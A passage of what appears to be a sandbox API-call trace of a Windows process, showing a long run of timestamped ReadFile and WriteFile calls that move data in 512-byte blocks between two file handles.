lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.569] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.570] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.570] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.571] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.571] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.571] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.572] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.572] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.573] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.573] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.574] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.574] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.575] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.575] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.576] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.576] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.577] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.577] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.578] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.578] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.579] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.579] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.580] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.580] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.581] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.581] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.582] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.582] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.583] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.583] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.584] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.584] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.585] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.585] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.586] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.586] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.586] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.587] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.587] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.588] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.589] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.589] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.589] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.590] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.590] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.591] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.591] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.592] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.592] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.593] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.593] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.594] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.594] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.595] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.595] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.596] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.597] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.597] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.598] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.598] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.599] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.599] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.600] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.600] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.601] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.602] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.602] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.603] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.603] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.604] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.604] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.605] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.605] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.606] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.606] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.607] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.607] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.608] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.608] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.609] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.609] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.610] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.611] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.612] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.612] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.613] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.614] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.614] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.615] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.615] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.616] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.616] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.617] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, 